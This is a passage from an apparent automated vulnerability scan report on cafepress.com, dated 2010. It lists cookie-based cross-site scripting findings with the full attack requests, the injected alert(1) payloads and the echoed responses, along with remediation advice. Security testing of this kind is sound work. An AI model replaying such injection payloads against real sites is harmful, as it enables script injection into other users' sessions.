__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 60935 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60935 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/help/tos.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc886</script><script>alert(1)</script>e31d106e7a6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/help/tos.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dc886</script><script>alert(1)</script>e31d106e7a6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 62950 Date: Sun, 26 Dec 2010 13:46:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 62950 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... n_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'HelpPage' window.cafepress.tealeaf.searchTerm = 'dc886</script><script>alert(1)</script>e31d106e7a6 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/sell/index.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 993ac"-alert(1)-"2f0f584fdd2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/sell/index.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 51652 Date: Sun, 26 Dec 2010 13:46:47 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 51652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/info/sell/index.aspx
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f40</script><script>alert(1)</script>dbb7f115d79 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/info/sell/index.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=41f40</script><script>alert(1)</script>dbb7f115d79 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 51674 Date: Sun, 26 Dec 2010 13:46:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 51674 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... s.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/info/sell/index.aspx' window.cafepress.tealeaf.searchTerm = '41f40</script><script>alert(1)</script>dbb7f115d79 ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/sitemap/
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8570a"-alert(1)-"90117c7ff9b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 147634 Date: Sun, 26 Dec 2010 13:46:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 147634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/sitemap/
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1af17</script><script>alert(1)</script>e3cc51a30ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=1af17</script><script>alert(1)</script>e3cc51a30ee ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 149634 Date: Sun, 26 Dec 2010 13:46:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 149634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]... ess.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = '/cp/sitemap/index.aspx' window.cafepress.tealeaf.searchTerm = '1af17</script><script>alert(1)</script>e3cc51a30ee ' window.cafepress.tealeaf.salesChannel = 'Other' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0...[SNIP]...
1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/cp/viewcart.aspx
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e199a"-alert(1)-"33c6f5a13e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
